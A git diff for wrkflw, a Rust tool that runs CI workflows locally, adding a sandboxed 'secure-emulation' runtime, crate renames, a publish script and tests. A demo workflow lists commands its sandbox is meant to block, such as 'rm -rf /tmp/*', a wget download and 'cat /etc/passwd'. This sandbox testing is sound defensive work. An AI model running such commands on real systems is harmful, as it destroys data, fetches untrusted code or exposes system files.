/// Explicitly validate as GitLab CI/CD pipeline
#[arg(long)]
@@ -69,7 +73,7 @@ enum Commands {
/// Path to workflow/pipeline file to execute
path: PathBuf,
/// Container runtime to use (docker, podman, emulation)
/// Container runtime to use (docker, podman, emulation, secure-emulation)
#[arg(short, long, value_enum, default_value = "docker")]
runtime: RuntimeChoice,
@@ -91,7 +95,7 @@ enum Commands {
/// Path to workflow file or directory (defaults to .github/workflows)
path: Option<PathBuf>,
/// Container runtime to use (docker, podman, emulation)
/// Container runtime to use (docker, podman, emulation, secure-emulation)
#[arg(short, long, value_enum, default_value = "docker")]
runtime: RuntimeChoice,
@@ -143,7 +147,7 @@ fn parse_key_val(s: &str) -> Result<(String, String), String> {
}
// Make this function public for testing? Or move to a utils/cleanup mod?
// Or call executor::cleanup and runtime::cleanup directly?
// Or call wrkflw_executor::cleanup and wrkflw_runtime::cleanup directly?
// Let's try calling them directly for now.
async fn cleanup_on_exit() {
// Clean up Docker resources if available, but don't let it block indefinitely
@@ -151,35 +155,35 @@ async fn cleanup_on_exit() {
match Docker::connect_with_local_defaults() {
Ok(docker) => {
// Assuming cleanup_resources exists in executor crate
executor::cleanup_resources(&docker).await;
wrkflw_executor::cleanup_resources(&docker).await;
}
Err(_) => {
// Docker not available
logging::info("Docker not available, skipping Docker cleanup");
wrkflw_logging::info("Docker not available, skipping Docker cleanup");
}
}
})
.await
{
Ok(_) => logging::debug("Docker cleanup completed successfully"),
Err(_) => {
logging::warning("Docker cleanup timed out after 3 seconds, continuing with shutdown")
}
Ok(_) => wrkflw_logging::debug("Docker cleanup completed successfully"),
Err(_) => wrkflw_logging::warning(
"Docker cleanup timed out after 3 seconds, continuing with shutdown",
),
}
// Always clean up emulation resources
match tokio::time::timeout(
std::time::Duration::from_secs(2),
// Assuming cleanup_resources exists in runtime::emulation module
runtime::emulation::cleanup_resources(),
// Assuming cleanup_resources exists in wrkflw_runtime::emulation module
wrkflw_runtime::emulation::cleanup_resources(),
)
.await
{
Ok(_) => logging::debug("Emulation cleanup completed successfully"),
Err(_) => logging::warning("Emulation cleanup timed out, continuing with shutdown"),
Ok(_) => wrkflw_logging::debug("Emulation cleanup completed successfully"),
Err(_) => wrkflw_logging::warning("Emulation cleanup timed out, continuing with shutdown"),
}
logging::info("Resource cleanup completed");
wrkflw_logging::info("Resource cleanup completed");
}
async fn handle_signals() {
@@ -207,7 +211,7 @@ async fn handle_signals() {
"Cleanup taking too long (over {} seconds), forcing exit...",
hard_exit_time.as_secs()
);
logging::error("Forced exit due to cleanup timeout");
wrkflw_logging::error("Forced exit due to cleanup timeout");
std::process::exit(1);
});
@@ -266,19 +270,41 @@ fn is_gitlab_pipeline(path: &Path) -> bool {
#[tokio::main]
async fn main() {
// Gracefully handle Broken pipe (EPIPE) when output is piped (e.g., to `head`)
let default_panic_hook = std::panic::take_hook();
std::panic::set_hook(Box::new(move |info| {
let mut is_broken_pipe = false;
if let Some(s) = info.payload().downcast_ref::<&str>() {
if s.contains("Broken pipe") {
is_broken_pipe = true;
}
}
if let Some(s) = info.payload().downcast_ref::<String>() {
if s.contains("Broken pipe") {
is_broken_pipe = true;
}
}
if is_broken_pipe {
// Treat as a successful, short-circuited exit
std::process::exit(0);
}
// Fallback to the default hook for all other panics
default_panic_hook(info);
}));
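The payload inspection in the hook above is worth isolating: a panic payload is a `&'static str` for string-literal panics and a `String` for formatted ones, so both downcasts must be tried. A standalone version (the helper name is illustrative, not code in the crate):

```rust
use std::any::Any;

/// True when a panic payload carries a broken-pipe message, whether the
/// payload is a `&str` (string-literal panics) or a `String` (formatted ones).
fn is_broken_pipe(payload: &dyn Any) -> bool {
    if let Some(s) = payload.downcast_ref::<&str>() {
        return s.contains("Broken pipe");
    }
    if let Some(s) = payload.downcast_ref::<String>() {
        return s.contains("Broken pipe");
    }
    false
}

fn main() {
    let literal: &str = "failed printing to stdout: Broken pipe (os error 32)";
    let formatted = String::from("Broken pipe");
    let other: &str = "unrelated panic";
    assert!(is_broken_pipe(&literal));
    assert!(is_broken_pipe(&formatted));
    assert!(!is_broken_pipe(&other));
}
```

Exiting with status 0 on a broken pipe matches the conventional Unix behavior when output is truncated by a downstream consumer such as `head`.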
let cli = Wrkflw::parse();
let verbose = cli.verbose;
let debug = cli.debug;
// Set log level based on command line flags
if debug {
logging::set_log_level(logging::LogLevel::Debug);
logging::debug("Debug mode enabled - showing detailed logs");
wrkflw_logging::set_log_level(wrkflw_logging::LogLevel::Debug);
wrkflw_logging::debug("Debug mode enabled - showing detailed logs");
} else if verbose {
logging::set_log_level(logging::LogLevel::Info);
logging::info("Verbose mode enabled");
wrkflw_logging::set_log_level(wrkflw_logging::LogLevel::Info);
wrkflw_logging::info("Verbose mode enabled");
} else {
logging::set_log_level(logging::LogLevel::Warning);
wrkflw_logging::set_log_level(wrkflw_logging::LogLevel::Warning);
}
// Setup a Ctrl+C handler that runs in the background
@@ -286,65 +312,78 @@ async fn main() {
match &cli.command {
Some(Commands::Validate {
path,
paths,
gitlab,
exit_code,
no_exit_code,
}) => {
// Determine the path to validate
let validate_path = path
.clone()
.unwrap_or_else(|| PathBuf::from(".github/workflows"));
// Check if the path exists
if !validate_path.exists() {
eprintln!("Error: Path does not exist: {}", validate_path.display());
std::process::exit(1);
}
// Determine the paths to validate (default to .github/workflows when none provided)
let validate_paths: Vec<PathBuf> = if paths.is_empty() {
vec![PathBuf::from(".github/workflows")]
} else {
paths.clone()
};
// Determine if we're validating a GitLab pipeline based on the --gitlab flag or file detection
let force_gitlab = *gitlab;
let mut validation_failed = false;
if validate_path.is_dir() {
// Validate all workflow files in the directory
let entries = std::fs::read_dir(&validate_path)
.expect("Failed to read directory")
.filter_map(|entry| entry.ok())
.filter(|entry| {
entry.path().is_file()
&& entry
.path()
.extension()
.is_some_and(|ext| ext == "yml" || ext == "yaml")
})
.collect::<Vec<_>>();
for validate_path in validate_paths {
// Check if the path exists; if not, mark failure but continue
if !validate_path.exists() {
eprintln!("Error: Path does not exist: {}", validate_path.display());
validation_failed = true;
continue;
}
println!("Validating {} workflow file(s)...", entries.len());
if validate_path.is_dir() {
// Validate all workflow files in the directory
let entries = std::fs::read_dir(&validate_path)
.expect("Failed to read directory")
.filter_map(|entry| entry.ok())
.filter(|entry| {
entry.path().is_file()
&& entry
.path()
.extension()
.is_some_and(|ext| ext == "yml" || ext == "yaml")
})
.collect::<Vec<_>>();
for entry in entries {
let path = entry.path();
let is_gitlab = force_gitlab || is_gitlab_pipeline(&path);
println!(
"Validating {} workflow file(s) in {}...",
entries.len(),
validate_path.display()
);
for entry in entries {
let path = entry.path();
let is_gitlab = force_gitlab || is_gitlab_pipeline(&path);
let file_failed = if is_gitlab {
validate_gitlab_pipeline(&path, verbose)
} else {
validate_github_workflow(&path, verbose)
};
if file_failed {
validation_failed = true;
}
}
} else {
// Validate a single workflow file
let is_gitlab = force_gitlab || is_gitlab_pipeline(&validate_path);
let file_failed = if is_gitlab {
validate_gitlab_pipeline(&path, verbose)
validate_gitlab_pipeline(&validate_path, verbose)
} else {
validate_github_workflow(&path, verbose)
validate_github_workflow(&validate_path, verbose)
};
if file_failed {
validation_failed = true;
}
}
} else {
// Validate a single workflow file
let is_gitlab = force_gitlab || is_gitlab_pipeline(&validate_path);
validation_failed = if is_gitlab {
validate_gitlab_pipeline(&validate_path, verbose)
} else {
validate_github_workflow(&validate_path, verbose)
};
}
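The multi-path handling above boils down to two small rules: default to `.github/workflows` when no paths are given, and treat only `.yml`/`.yaml` entries as workflows when walking a directory. Extracted as hypothetical helpers (not functions in the crate):

```rust
use std::path::{Path, PathBuf};

/// Default to `.github/workflows` when the user passes no paths.
fn resolve_validate_paths(paths: Vec<PathBuf>) -> Vec<PathBuf> {
    if paths.is_empty() {
        vec![PathBuf::from(".github/workflows")]
    } else {
        paths
    }
}

/// The same extension test the directory walk applies to each entry.
fn is_yaml(path: &Path) -> bool {
    path.extension().is_some_and(|ext| ext == "yml" || ext == "yaml")
}

fn main() {
    assert_eq!(
        resolve_validate_paths(vec![]),
        vec![PathBuf::from(".github/workflows")]
    );
    assert_eq!(
        resolve_validate_paths(vec![PathBuf::from("ci.yml")]),
        vec![PathBuf::from("ci.yml")]
    );
    assert!(is_yaml(Path::new("ci.yaml")));
    assert!(!is_yaml(Path::new("Dockerfile")));
}
```

Note that a nonexistent path now marks the run as failed but the loop continues, so one bad argument no longer aborts validation of the remaining paths.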
// Set exit code if validation failed and exit_code flag is true (and no_exit_code is false)
@@ -360,7 +399,7 @@ async fn main() {
gitlab,
}) => {
// Create execution configuration
let config = executor::ExecutionConfig {
let config = wrkflw_executor::ExecutionConfig {
runtime_type: runtime.clone().into(),
verbose,
preserve_containers_on_failure: *preserve_containers_on_failure,
@@ -374,10 +413,10 @@ async fn main() {
"GitHub workflow"
};
logging::info(&format!("Running {} at: {}", workflow_type, path.display()));
wrkflw_logging::info(&format!("Running {} at: {}", workflow_type, path.display()));
// Execute the workflow
let result = executor::execute_workflow(path, config)
let result = wrkflw_executor::execute_workflow(path, config)
.await
.unwrap_or_else(|e| {
eprintln!("Error executing workflow: {}", e);
@@ -419,15 +458,15 @@ async fn main() {
println!(
" {} {} ({})",
match job.status {
executor::JobStatus::Success => "✅",
executor::JobStatus::Failure => "❌",
executor::JobStatus::Skipped => "⏭️",
wrkflw_executor::JobStatus::Success => "✅",
wrkflw_executor::JobStatus::Failure => "❌",
wrkflw_executor::JobStatus::Skipped => "⏭️",
},
job.name,
match job.status {
executor::JobStatus::Success => "success",
executor::JobStatus::Failure => "failure",
executor::JobStatus::Skipped => "skipped",
wrkflw_executor::JobStatus::Success => "success",
wrkflw_executor::JobStatus::Failure => "failure",
wrkflw_executor::JobStatus::Skipped => "skipped",
}
);
@@ -435,15 +474,15 @@ async fn main() {
println!(" Steps:");
for step in job.steps {
let step_status = match step.status {
executor::StepStatus::Success => "✅",
executor::StepStatus::Failure => "❌",
executor::StepStatus::Skipped => "⏭️",
wrkflw_executor::StepStatus::Success => "✅",
wrkflw_executor::StepStatus::Failure => "❌",
wrkflw_executor::StepStatus::Skipped => "⏭️",
};
println!(" {} {}", step_status, step.name);
// If step failed and we're not in verbose mode, show condensed error info
- if step.status == executor::StepStatus::Failure && !verbose {
+ if step.status == wrkflw_executor::StepStatus::Failure && !verbose {
// Extract error information from step output
let error_lines = step
.output
@@ -482,7 +521,7 @@ async fn main() {
.map(|v| v.iter().cloned().collect::<HashMap<String, String>>());
// Trigger the pipeline
- if let Err(e) = gitlab::trigger_pipeline(branch.as_deref(), variables).await {
+ if let Err(e) = wrkflw_gitlab::trigger_pipeline(branch.as_deref(), variables).await {
eprintln!("Error triggering GitLab pipeline: {}", e);
std::process::exit(1);
}
@@ -497,7 +536,7 @@ async fn main() {
let runtime_type = runtime.clone().into();
// Call the TUI implementation from the ui crate
- if let Err(e) = ui::run_wrkflw_tui(
+ if let Err(e) = wrkflw_ui::run_wrkflw_tui(
path.as_ref(),
runtime_type,
verbose,
@@ -520,7 +559,9 @@ async fn main() {
.map(|i| i.iter().cloned().collect::<HashMap<String, String>>());
// Trigger the workflow
- if let Err(e) = github::trigger_workflow(workflow, branch.as_deref(), inputs).await {
+ if let Err(e) =
+     wrkflw_github::trigger_workflow(workflow, branch.as_deref(), inputs).await
+ {
eprintln!("Error triggering GitHub workflow: {}", e);
std::process::exit(1);
}
@@ -530,10 +571,10 @@ async fn main() {
}
None => {
// Launch TUI by default when no command is provided
- let runtime_type = executor::RuntimeType::Docker;
+ let runtime_type = wrkflw_executor::RuntimeType::Docker;
// Call the TUI implementation from the ui crate with default path
- if let Err(e) = ui::run_wrkflw_tui(None, runtime_type, verbose, false).await {
+ if let Err(e) = wrkflw_ui::run_wrkflw_tui(None, runtime_type, verbose, false).await {
eprintln!("Error running TUI: {}", e);
std::process::exit(1);
}
@@ -547,13 +588,13 @@ fn validate_github_workflow(path: &Path, verbose: bool) -> bool {
print!("Validating GitHub workflow file: {}... ", path.display());
// Use the ui crate's validate_workflow function
- match ui::validate_workflow(path, verbose) {
+ match wrkflw_ui::validate_workflow(path, verbose) {
Ok(_) => {
// The detailed validation output is already printed by the function
// We need to check if there were validation issues
- // Since ui::validate_workflow doesn't return the validation result directly,
+ // Since wrkflw_ui::validate_workflow doesn't return the validation result directly,
// we need to call the evaluator directly to get the result
- match evaluator::evaluate_workflow_file(path, verbose) {
+ match wrkflw_evaluator::evaluate_workflow_file(path, verbose) {
Ok(result) => !result.is_valid,
Err(_) => true, // Parse errors count as validation failure
}
@@ -571,12 +612,12 @@ fn validate_gitlab_pipeline(path: &Path, verbose: bool) -> bool {
print!("Validating GitLab CI pipeline file: {}... ", path.display());
// Parse and validate the pipeline file
- match parser::gitlab::parse_pipeline(path) {
+ match wrkflw_parser::gitlab::parse_pipeline(path) {
Ok(pipeline) => {
println!("✅ Valid syntax");
// Additional structural validation
- let validation_result = validators::validate_gitlab_pipeline(&pipeline);
+ let validation_result = wrkflw_validators::validate_gitlab_pipeline(&pipeline);
if !validation_result.is_valid {
println!("⚠️ Validation issues:");

publish_crates.sh Executable file

@@ -0,0 +1,179 @@
#!/bin/bash
# Enhanced script to manage versions and publish all wrkflw crates using cargo-workspaces
set -e
# Parse command line arguments
COMMAND=${1:-""}
VERSION_TYPE=${2:-""}
DRY_RUN=""
show_help() {
echo "Usage: $0 <command> [options]"
echo ""
echo "Commands:"
echo " version <type> Update versions across workspace"
echo " Types: patch, minor, major"
echo " publish Publish all crates to crates.io"
echo " release <type> Update versions and publish (combines version + publish)"
echo " help Show this help message"
echo ""
echo "Options:"
echo " --dry-run Test without making changes (for publish/release)"
echo ""
echo "Examples:"
echo " $0 version minor # Bump to 0.7.0"
echo " $0 publish --dry-run # Test publishing"
echo " $0 release minor --dry-run # Test version bump + publish"
echo " $0 release patch # Release patch version"
}
# Parse dry-run flag from any position
for arg in "$@"; do
if [[ "$arg" == "--dry-run" ]]; then
DRY_RUN="--dry-run"
fi
done
case "$COMMAND" in
"help"|"-h"|"--help"|"")
show_help
exit 0
;;
"version")
if [[ -z "$VERSION_TYPE" ]]; then
echo "❌ Error: Version type required (patch, minor, major)"
echo ""
show_help
exit 1
fi
;;
"publish")
# publish command doesn't need version type
;;
"release")
if [[ -z "$VERSION_TYPE" ]]; then
echo "❌ Error: Version type required for release (patch, minor, major)"
echo ""
show_help
exit 1
fi
;;
*)
echo "❌ Error: Unknown command '$COMMAND'"
echo ""
show_help
exit 1
;;
esac
# Check if cargo-workspaces is installed
if ! command -v cargo-workspaces &> /dev/null; then
echo "❌ cargo-workspaces not found. Installing..."
cargo install cargo-workspaces
fi
# Check if we're logged in to crates.io (only for publish operations)
if [[ "$COMMAND" == "publish" ]] || [[ "$COMMAND" == "release" ]]; then
if [ ! -f ~/.cargo/credentials.toml ] && [ ! -f ~/.cargo/credentials ]; then
echo "❌ Not logged in to crates.io. Please run: cargo login <your-token>"
exit 1
fi
fi
# Function to update versions
update_versions() {
local version_type=$1
echo "🔄 Updating workspace versions ($version_type)..."
if [[ "$DRY_RUN" == "--dry-run" ]]; then
echo "🧪 DRY RUN: Simulating version update"
echo ""
echo "Current workspace version: $(grep '^version =' Cargo.toml | cut -d'"' -f2)"
echo "Would execute: cargo workspaces version $version_type"
echo ""
echo "This would update all crates and their internal dependencies."
echo "✅ Version update simulation completed (no changes made)"
else
cargo workspaces version "$version_type"
echo "✅ Versions updated successfully"
fi
}
# Function to test build
test_build() {
echo "🔨 Testing workspace build..."
if cargo build --workspace; then
echo "✅ Workspace builds successfully"
else
echo "❌ Build failed. Please fix errors before publishing."
exit 1
fi
}
# Function to publish crates
publish_crates() {
echo "📦 Publishing crates to crates.io..."
if [[ "$DRY_RUN" == "--dry-run" ]]; then
echo "🧪 DRY RUN: Testing publication"
cargo workspaces publish --dry-run
echo "✅ All crates passed dry-run tests!"
echo ""
echo "To actually publish, run:"
echo " $0 publish"
else
cargo workspaces publish
echo "🎉 All crates published successfully!"
echo ""
echo "Users can now install wrkflw with:"
echo " cargo install wrkflw"
fi
}
# Function to show changelog info
show_changelog_info() {
echo "📝 Changelog will be generated automatically by GitHub Actions workflow"
}
# Execute commands based on the operation
case "$COMMAND" in
"version")
update_versions "$VERSION_TYPE"
show_changelog_info
;;
"publish")
test_build
publish_crates
;;
"release")
echo "🚀 Starting release process..."
echo ""
# Step 1: Update versions
update_versions "$VERSION_TYPE"
# Step 2: Test build
test_build
# Step 3: Show changelog info
show_changelog_info
# Step 4: Publish (if not dry-run)
if [[ "$DRY_RUN" != "--dry-run" ]]; then
echo ""
read -p "🤔 Continue with publishing? (y/N): " -n 1 -r
echo
if [[ $REPLY =~ ^[Yy]$ ]]; then
publish_crates
else
echo "⏸️ Publishing cancelled. To publish later, run:"
echo " $0 publish"
fi
else
echo ""
publish_crates
fi
;;
esac
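The script's `--dry-run` handling scans every argument rather than a fixed position, so the flag works anywhere on the command line. A minimal, self-contained sketch of that pattern (`parse_flags` is a hypothetical helper for illustration, not part of publish_crates.sh):

```shell
#!/bin/bash
# Sketch of position-independent flag detection, mirroring the loop above.
# parse_flags is a hypothetical helper used only for this illustration.
parse_flags() {
    DRY_RUN=""
    for arg in "$@"; do
        if [[ "$arg" == "--dry-run" ]]; then
            DRY_RUN="--dry-run"
        fi
    done
}

parse_flags release minor --dry-run
echo "after 'release minor --dry-run': DRY_RUN='$DRY_RUN'"

parse_flags publish
echo "after 'publish': DRY_RUN='$DRY_RUN'"
```

Because the loop inspects `"$@"` in full, invocations like `./publish_crates.sh --dry-run release minor` behave the same as `./publish_crates.sh release minor --dry-run`.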


@@ -1,6 +1,6 @@
# Testing Strategy
- This directory contains integration tests for the `wrkflw` project. We follow the Rust testing best practices by organizing tests as follows:
+ This directory contains all tests and test-related files for the `wrkflw` project. We follow the Rust testing best practices by organizing tests as follows:
## Test Organization
@@ -11,6 +11,17 @@ This directory contains integration tests for the `wrkflw` project. We follow th
- **End-to-End Tests**: Also located in this `tests/` directory
- `cleanup_test.rs` - Tests for cleanup functionality with Docker resources
## Test Directory Structure
- **`fixtures/`**: Test data and configuration files
- `gitlab-ci/` - GitLab CI configuration files for testing
- **`workflows/`**: GitHub Actions workflow files for testing
- Various YAML files for testing workflow validation and execution
- **`scripts/`**: Test automation scripts
- `test-podman-basic.sh` - Basic Podman integration test script
- `test-preserve-containers.sh` - Container preservation testing script
- **`TESTING_PODMAN.md`**: Comprehensive Podman testing documentation
## Running Tests
To run all tests:


@@ -70,21 +70,21 @@ Expected: Should show `--runtime` option with default value `docker`.
#### 1.2 Test Podman Runtime Selection
```bash
# Should accept podman as runtime
- ./target/release/wrkflw run --runtime podman test-workflows/example.yml
+ ./target/release/wrkflw run --runtime podman tests/workflows/example.yml
```
Expected: Should run without CLI argument errors.
#### 1.3 Test Emulation Runtime Selection
```bash
# Should accept emulation as runtime
- ./target/release/wrkflw run --runtime emulation test-workflows/example.yml
+ ./target/release/wrkflw run --runtime emulation tests/workflows/example.yml
```
Expected: Should run without CLI argument errors.
#### 1.4 Test Invalid Runtime Selection
```bash
# Should reject invalid runtime
- ./target/release/wrkflw run --runtime invalid test-workflows/example.yml
+ ./target/release/wrkflw run --runtime invalid tests/workflows/example.yml
```
Expected: Should show error about invalid runtime choice.
@@ -172,7 +172,7 @@ Expected: All three runtimes should produce similar results (emulation may have
#### 4.1 Test TUI Runtime Selection
```bash
- ./target/release/wrkflw tui test-workflows/
+ ./target/release/wrkflw tui tests/workflows/
```
**Test Steps:**


@@ -0,0 +1,120 @@
use std::fs;
use tempfile::tempdir;
use wrkflw::executor::engine::{execute_workflow, ExecutionConfig, RuntimeType};
fn write_file(path: &std::path::Path, content: &str) {
fs::write(path, content).expect("failed to write file");
}
#[tokio::test]
async fn test_local_reusable_workflow_execution_success() {
// Create temp workspace
let dir = tempdir().unwrap();
let called_path = dir.path().join("called.yml");
let caller_path = dir.path().join("caller.yml");
// Minimal called workflow with one successful job
let called = r#"
name: Called
on: workflow_dispatch
jobs:
inner:
runs-on: ubuntu-latest
steps:
- run: echo "hello from called"
"#;
write_file(&called_path, called);
// Caller workflow that uses the called workflow via absolute local path
let caller = format!(
r#"
name: Caller
on: workflow_dispatch
jobs:
call:
uses: {}
with:
foo: bar
secrets:
token: testsecret
"#,
called_path.display()
);
write_file(&caller_path, &caller);
// Execute caller workflow with emulation runtime
let cfg = ExecutionConfig {
runtime_type: RuntimeType::Emulation,
verbose: false,
preserve_containers_on_failure: false,
};
let result = execute_workflow(&caller_path, cfg)
.await
.expect("workflow execution failed");
// Expect a single caller job summarized
assert_eq!(result.jobs.len(), 1, "expected one caller job result");
let job = &result.jobs[0];
assert_eq!(job.name, "call");
assert_eq!(format!("{:?}", job.status), "Success");
// Summary step should include reference to called workflow and inner job status
assert!(
    job.logs.contains("Called workflow:"),
    "expected summary logs to include called workflow path"
);
assert!(
    job.logs.contains("- inner: Success"),
    "expected inner job success in summary"
);
}
#[tokio::test]
async fn test_local_reusable_workflow_execution_failure_propagates() {
// Create temp workspace
let dir = tempdir().unwrap();
let called_path = dir.path().join("called.yml");
let caller_path = dir.path().join("caller.yml");
// Called workflow with failing job
let called = r#"
name: Called
on: workflow_dispatch
jobs:
inner:
runs-on: ubuntu-latest
steps:
- run: false
"#;
write_file(&called_path, called);
// Caller workflow
let caller = format!(
r#"
name: Caller
on: workflow_dispatch
jobs:
call:
uses: {}
"#,
called_path.display()
);
write_file(&caller_path, &caller);
// Execute caller workflow
let cfg = ExecutionConfig {
runtime_type: RuntimeType::Emulation,
verbose: false,
preserve_containers_on_failure: false,
};
let result = execute_workflow(&caller_path, cfg)
.await
.expect("workflow execution failed");
assert_eq!(result.jobs.len(), 1);
let job = &result.jobs[0];
assert_eq!(job.name, "call");
assert_eq!(format!("{:?}", job.status), "Failure");
assert!(job.logs.contains("- inner: Failure"));
}

tests/safe_workflow.yml Normal file

@@ -0,0 +1,35 @@
name: Safe Workflow Test
on:
push:
workflow_dispatch:
jobs:
safe_operations:
name: Safe Operations
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: List files
run: ls -la
- name: Show current directory
run: pwd
- name: Echo message
run: echo "Hello, this is a safe command!"
- name: Create and read file
run: |
echo "test content" > safe-file.txt
cat safe-file.txt
rm safe-file.txt
- name: Show environment (safe)
run: echo "GITHUB_WORKSPACE=$GITHUB_WORKSPACE"
- name: Check if Rust is available
run: which rustc && rustc --version || echo "Rust not found"
continue-on-error: true


@@ -59,7 +59,7 @@ fi
# Test 2: Check invalid runtime rejection
print_status "Test 2: Testing invalid runtime rejection..."
- if ./target/release/wrkflw run --runtime invalid test-workflows/example.yml 2>&1 | grep -q "invalid value"; then
+ if ./target/release/wrkflw run --runtime invalid tests/workflows/example.yml 2>&1 | grep -q "invalid value"; then
print_success "Invalid runtime properly rejected"
else
print_error "Invalid runtime not properly rejected"


@@ -0,0 +1,29 @@
name: Security Comparison Demo
on:
push:
workflow_dispatch:
jobs:
safe_operations:
name: Safe Operations (Works in Both Modes)
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: List files
run: ls -la
- name: Create and test file
run: |
echo "Hello World" > test.txt
cat test.txt
rm test.txt
echo "File operations completed safely"
- name: Environment check
run: |
echo "Current directory: $(pwd)"
echo "User: $(whoami)"
echo "Available commands: ls, echo, cat work fine"

tests/security_demo.yml Normal file

@@ -0,0 +1,92 @@
name: Security Demo Workflow
on:
push:
workflow_dispatch:
jobs:
safe_commands:
name: Safe Commands (Will Pass)
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: List project files
run: ls -la
- name: Show current directory
run: pwd
- name: Echo a message
run: echo "This command is safe and will execute successfully"
- name: Check Rust version (if available)
run: rustc --version || echo "Rust not installed"
- name: Build documentation
run: echo "Building docs..." && mkdir -p target/doc
- name: Show environment
run: env | grep GITHUB
dangerous_commands:
name: Dangerous Commands (Will Be Blocked)
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
# These commands will be blocked in secure emulation mode
- name: Dangerous file deletion
run: rm -rf /tmp/* # This will be BLOCKED
continue-on-error: true
- name: System modification attempt
run: sudo apt-get update # This will be BLOCKED
continue-on-error: true
- name: Network download attempt
run: wget https://example.com/script.sh # This will be BLOCKED
continue-on-error: true
- name: Process manipulation
run: kill -9 $$ # This will be BLOCKED
continue-on-error: true
resource_intensive:
name: Resource Limits Test
runs-on: ubuntu-latest
steps:
- name: CPU intensive task
run: |
echo "Testing resource limits..."
# This might hit CPU or time limits
for i in {1..1000}; do
echo "Iteration $i"
sleep 0.1
done
continue-on-error: true
filesystem_test:
name: Filesystem Access Test
runs-on: ubuntu-latest
steps:
- name: Create files in allowed location
run: |
mkdir -p ./test-output
echo "test content" > ./test-output/safe-file.txt
cat ./test-output/safe-file.txt
- name: Attempt to access system files
run: cat /etc/passwd # This may be blocked
continue-on-error: true
- name: Show allowed file operations
run: |
echo "Safe file operations:"
touch ./temp-file.txt
echo "content" > ./temp-file.txt
cat ./temp-file.txt
rm ./temp-file.txt
echo "File operations completed safely"
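The blocked commands exercised by this workflow can be illustrated with a toy denylist check in shell. This is only a sketch of the idea behind secure emulation; the function name and patterns are assumptions for illustration, not wrkflw's actual sandbox, which also enforces resource and filesystem limits:

```shell
#!/bin/bash
# Toy denylist gate, illustrating the kind of check a secure emulation
# mode might apply before running a step's command. Patterns are
# illustrative only, not wrkflw's real rule set.
is_blocked() {
    case "$1" in
        rm\ -rf*|sudo\ *|wget\ *|curl\ *|kill\ *) return 0 ;;  # blocked
        *) return 1 ;;                                         # allowed
    esac
}

for cmd in 'echo "safe message"' 'sudo apt-get update' 'wget https://example.com/script.sh'; do
    if is_blocked "$cmd"; then
        echo "BLOCKED: $cmd"
    else
        echo "ALLOWED: $cmd"
    fi
done
```

A prefix denylist alone is easy to bypass (e.g. via subshells or aliases), which is why the workflow above also probes resource limits and filesystem access rather than relying on command matching alone.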

Some files were not shown because too many files have changed in this diff.